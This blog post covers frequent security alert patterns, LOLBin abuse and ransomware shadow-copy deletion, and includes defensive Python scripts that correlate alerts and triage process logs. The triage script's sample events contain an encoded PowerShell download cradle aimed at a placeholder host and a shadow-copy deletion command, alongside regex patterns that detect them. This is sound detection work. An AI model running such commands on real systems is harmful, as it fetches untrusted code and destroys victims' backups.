
Here is a fact you always need to keep in mind:

For every novel (new) attack technique discovered, there are countless attacks taking place somewhere in the same time frame that use well-known and well-trodden tactics. For every attack carried out by a nation state, there are a dozen million-dollar ransomware attacks that still started with a simple phishing email.

This is why watching the trends is so important: it provides a view of what you’re most likely to encounter.

Does it make sense?

Thus, in this post we are going to look at a larger swath of IoC alerts to see what is most frequently encountered by companies of all sizes.

-

Signal From The Noise

One of the biggest issues security teams face is 'alert fatigue'. The numbers back this up: 93 percent of respondents said they receive at least 5,000 alerts per day. In circumstances like this, it’s absolutely critical for you to be able to separate what’s important from what can be discarded.

The vast majority of alerts fall into the low and medium severity categories (35 and 50 percent, respectively). It may be tempting to ignore alerts with lower severities outright. Indeed, in some circumstances, this may be the correct course of action. BUT NOT ALWAYS…

Under some circumstances, low severity alerts can be just as concerning as a critical severity alert. The trick is to figure out the context surrounding them. What happened before and after an alert? Are there other lower-severity alerts in the same time frame? Stringing together a series of suspicious alerts can give a much clearer picture of potential attacks that may only alert on lower severity IoCs.

For example, let’s say an attacker sends a phishing email to your organization. If the recipient opens the Word attachment, a macro contained within launches a script (triggering the IoC W32.WinWord.Powershell.ioc). The script in turn runs encoded PowerShell commands (W32.PowershellEncodedBuffer.ioc) to set the stage to download further malicious code (W32.PowershellDownloadString.ioc).

This scenario is comprised entirely of low- and medium-severity IoCs. Each of these by itself does not necessarily point to an attack, but when viewed as a string of IoCs, it’s very unlikely that they would be associated with anything but malicious activity. At the end of the day, the idea with the lower IoC categories is that they indicate activity within your environment that should be investigated.
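The following is an added example (not code from the original post) of how the chaining described above can be automated: a small correlator that walks per-host alert history and reports every host where the three IoCs from the phishing scenario fire in order within a short window. The IoC names are the ones the post uses; the alert records, host names, timestamps and the 10-minute window are constructed assumptions.

```python
"""Correlate low/medium-severity IoC alerts into an ordered attack chain.

Added example, not from the original post. The IoC names come from the post's
phishing scenario; the alert records, hosts, timestamps and window are constructed.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Ordered chain of IoCs from the post's phishing scenario: Word macro launches
# PowerShell, which runs an encoded buffer, which downloads further code.
PHISHING_CHAIN = [
    "W32.WinWord.Powershell.ioc",
    "W32.PowershellEncodedBuffer.ioc",
    "W32.PowershellDownloadString.ioc",
]

# Constructed sample alerts. Host ws-017 shows the full chain; ws-042 shows the
# same IoCs out of order and hours apart, which should not be reported.
SAMPLE_ALERTS = [
    {"host": "ws-017", "ioc": "W32.WinWord.Powershell.ioc", "severity": "low", "ts": "2021-03-02T09:14:03"},
    {"host": "ws-017", "ioc": "W32.PowershellEncodedBuffer.ioc", "severity": "medium", "ts": "2021-03-02T09:14:09"},
    {"host": "ws-017", "ioc": "W32.PowershellDownloadString.ioc", "severity": "medium", "ts": "2021-03-02T09:14:31"},
    {"host": "ws-042", "ioc": "W32.PowershellEncodedBuffer.ioc", "severity": "medium", "ts": "2021-03-02T11:02:00"},
    {"host": "ws-042", "ioc": "W32.WinWord.Powershell.ioc", "severity": "low", "ts": "2021-03-02T13:45:10"},
]


def find_chains(alerts, chain, window=timedelta(minutes=10)):
    """Return (host, first_ts, last_ts) for every host whose alerts contain the
    IoCs in `chain`, in that order, all within `window` of the first IoC.

    Severity of the individual alerts is deliberately ignored: the point is
    that the *sequence* is what makes low-severity alerts worth escalating.
    """
    by_host = defaultdict(list)
    for a in alerts:
        by_host[a["host"]].append((datetime.fromisoformat(a["ts"]), a["ioc"]))

    hits = []
    for host, events in by_host.items():
        events.sort()  # chronological order per host
        for i, (start, ioc) in enumerate(events):
            if ioc != chain[0]:
                continue  # only the first IoC of the chain can open a sequence
            step, last = 1, start
            for ts, name in events[i + 1:]:
                if ts - start > window:
                    break  # window expired without completing the chain
                if name == chain[step]:
                    step, last = step + 1, ts
                    if step == len(chain):
                        hits.append((host, start.isoformat(), last.isoformat()))
                        break
    return hits


if __name__ == "__main__":
    for host, first, last in find_chains(SAMPLE_ALERTS, PHISHING_CHAIN):
        print(f"escalate: {host} completed phishing chain between {first} and {last}")
```

In practice the alerts would come from your EDR or SIEM export rather than an inline list, and each completed chain would be raised as a single high-severity case that links the underlying low- and medium-severity alerts. The out-of-order events on ws-042 are left alone, which is the behaviour you want from a sequence rule: it escalates on the pattern, not on any one IoC.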

LOLBins

Utilizing the tools built into operating systems is a very common attack tactic these days. Leveraging such readily available binaries decreases the chances that an attacker will be discovered, compared to custom-tailored malicious tools that can stand out. Using readily available tools for malicious activity is generally referred to as “living off the land,” and the binaries utilized are called LOLBins.

20-27% of the IoC alerts organizations encountered at least once in a given month are related to suspicious LOLBin activity.

Two LOLBins in particular appear to dominate the top LOLBin IoCs seen:

1. PowerShell
2. Windows Scripting Host (covering both WScript and CScript).

Both of these LOLBins facilitate the execution of scripts within the Windows operating system. In many cases, PowerShell is used to download malicious code into memory or download further executables. The Windows Scripting Host is often leveraged to launch malicious files, perform reconnaissance, move throughout the network, or contact remote locations.

The figure above compares the two primary desktop operating systems, Windows and macOS, to show how attackers are targeting each. I have marked the presence of LOLBins in both.

What’s interesting in looking at the malicious use of these native binaries is that bad actors often leverage one LOLBin to launch another. Malicious actors likely swap LOLBins during an attack in order to hide their tracks.

Adware appears quite frequently on macOS as well, comprising four of the top ten IoCs seen. What’s interesting is that LOLBins don’t appear as frequently here as they do on Windows. Instead, attackers are likely to hide their presence by disabling the security programs, excluding their files from quarantine, clearing command histories, and hiding files.

-

• The most common IoC alert seen relating to ransomware is the deletion of shadow copies, which are snapshots of the file system used by the Windows operating system for backups. Ransomware threats often delete these files to prevent encrypted files from being restored from local backups. This particular IoC comprised 66 percent of all ransomware-related IoC alerts.

• The most commonly encountered credential stealing tool, Mimikatz, was already mentioned in my previous post. Apart from Mimikatz, malicious actors were seen utilizing the Findstr utility on files, digging through LSASS, and combing through the registry in order to find credentials.

• Adware features heavily on both Windows and macOS operating systems. The adware appearing in the top five generally behaves in a manner closer to malware than to a simple annoyance that shows you an unexpected advertisement.

-

How Can You Defend?

If you’re going to do one thing with this new information to protect your organization, focus your efforts on what consistently crops up in these lists: LOLBins.

Of course, this may be easier said than done, not only because these binaries are baked into the OS, but because many IT organizations utilize them in their daily operations. So how do you differentiate between normal operations and malicious activity? While it’s fairly obvious when some actions are being carried out by bad actors, others are not so clear.

First and foremost, it’s important to ensure you enable adequate logging on systems. The fact is you can’t pinpoint malicious activity if there’s no record of it.

It’s also important to have a clear understanding of the types of commands and activity that you can expect within these logs. Filtering out what you know is being carried out through automation or IT activities will clear out much of the noise, making it easier to drill down into what remains.

It’s also important to look for patterns. Individual activities and commands may not appear malicious on their own, but in the context of a series of commands run before and after, a malicious pattern may emerge. Create playbooks that address these patterns and use automation to detect when they trigger.

When it comes to what commands and activities are expected, every organization is different. Establishing your approach often requires the involvement of a variety of people from different teams. Establishing those communications will not only help when building out a defensive plan, but can be critical in quickly resolving an incident if one arises.
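The three defensive steps above (log process creation, filter out the automation you already know about, then look for patterns in what remains) can be put together in a few dozen lines. The script below is an added example, not part of the original post: it takes constructed process-creation events of the kind an EDR or Sysmon would log, drops those that match an assumed baseline of known IT automation, decodes PowerShell `-EncodedCommand` payloads so the real command line is visible, and tags the remaining events with the LOLBin patterns discussed on this page (Office spawning a script host, encoded PowerShell, download cradles, script hosts run from a temp folder, shadow copy deletion). The baseline entries, users, paths and the sample events are all assumptions for illustration.

```python
"""Triage LOLBin process-creation events: drop known automation, decode encoded
PowerShell, and tag the patterns that remain.

Added example, not from the original post. Log events, baseline entries,
user names and paths are constructed for illustration.
"""
import base64
import re

# Constructed download-cradle command, embedded as PowerShell would encode it
# (UTF-16LE then base64) so the sample looks like a real -EncodedCommand line.
DOWNLOADER = "(New-Object Net.WebClient).DownloadString('http://example.invalid/x')"
ENCODED = base64.b64encode(DOWNLOADER.encode("utf-16le")).decode("ascii")

# Constructed process-creation events (a simplified shape of Sysmon event ID 1).
SAMPLE_EVENTS = [
    {"user": "CORP\\svc-patch", "parent": "C:\\Windows\\System32\\svchost.exe",
     "cmd": "powershell.exe -File C:\\Scripts\\patch-check.ps1"},
    {"user": "CORP\\jdoe", "parent": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE",
     "cmd": "powershell.exe -NoP -W Hidden -EncodedCommand " + ENCODED},
    {"user": "CORP\\jdoe", "parent": "C:\\Windows\\System32\\cmd.exe",
     "cmd": "wscript.exe C:\\Users\\jdoe\\AppData\\Local\\Temp\\inv.vbs"},
    {"user": "CORP\\backup", "parent": "C:\\Windows\\System32\\services.exe",
     "cmd": "vssadmin.exe list shadows"},
    {"user": "CORP\\jdoe", "parent": "C:\\Windows\\System32\\cmd.exe",
     "cmd": "vssadmin.exe delete shadows /all /quiet"},
]

# Assumed baseline of known-good automation: (user regex, command-line regex).
# Anything matching here is IT activity you have already accounted for.
BASELINE = [
    (r"CORP\\svc-patch", r"^powershell\.exe -File C:\\Scripts\\[\w-]+\.ps1$"),
    (r"CORP\\backup", r"^vssadmin\.exe list shadows$"),
]

OFFICE_PARENTS = ("winword.exe", "excel.exe", "powerpnt.exe")
SCRIPT_HOSTS = ("powershell.exe", "wscript.exe", "cscript.exe")
ENC_RE = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def decode_encoded_command(cmd):
    """Return the plaintext of a PowerShell -EncodedCommand argument, or None."""
    m = ENC_RE.search(cmd)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None  # malformed base64 or odd byte count: not a valid payload


def is_baseline(event):
    """True when the event matches an entry of the known-automation baseline."""
    return any(re.fullmatch(u, event["user"]) and re.search(c, event["cmd"])
               for u, c in BASELINE)


def triage(events):
    """Return findings for events that are not baseline and match a pattern."""
    findings = []
    for ev in events:
        if is_baseline(ev):
            continue
        parent = ev["parent"].lower().rsplit("\\", 1)[-1]
        image = ev["cmd"].split()[0].lower()
        decoded = decode_encoded_command(ev["cmd"])
        effective = ev["cmd"] + ("\n" + decoded if decoded else "")
        reasons = []
        if parent in OFFICE_PARENTS and image in SCRIPT_HOSTS:
            reasons.append("office-spawned-script-host")
        if decoded is not None:
            reasons.append("encoded-powershell")
        if re.search(r"downloadstring|downloadfile|invoke-webrequest", effective, re.I):
            reasons.append("download-cradle")
        if image in ("wscript.exe", "cscript.exe") and re.search(r"\\temp\\", ev["cmd"], re.I):
            reasons.append("script-host-from-temp")
        if image == "vssadmin.exe" and re.search(r"delete\s+shadows", ev["cmd"], re.I):
            reasons.append("shadow-copy-deletion")
        if reasons:
            findings.append({"user": ev["user"], "cmd": ev["cmd"],
                             "decoded": decoded, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f["user"], f["reasons"], f["decoded"] or f["cmd"])
```

Two design points worth noting. The baseline is keyed on both the account and the exact command line, so a compromised service account running something other than its scheduled script still surfaces. And the encoded payload is decoded before pattern matching, which is what turns the opaque `W32.PowershellEncodedBuffer`-style alert into something an analyst can read and a playbook can act on.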

-

👉 Please let me know what you think about this in the comments section. You can also share it with others if the information here helps you in some way.

If you are truly interested in reading more of such high-quality posts on cybersecurity, you can always let me know by leaving your comments.



This Article Was Written & published by Meena R,  Senior Manager - IT, at Luminis Consulting Services Pvt. Ltd, India. 

Over the past 16 years, Meena has built a following of IT professionals, particularly in Cybersecurity, Cisco Technologies, and Networking...

She is so passionate about the Cybersecurity domain that she goes out of her way to share hugely valuable posts and writings about Cybersecurity on her website and on social media platforms.
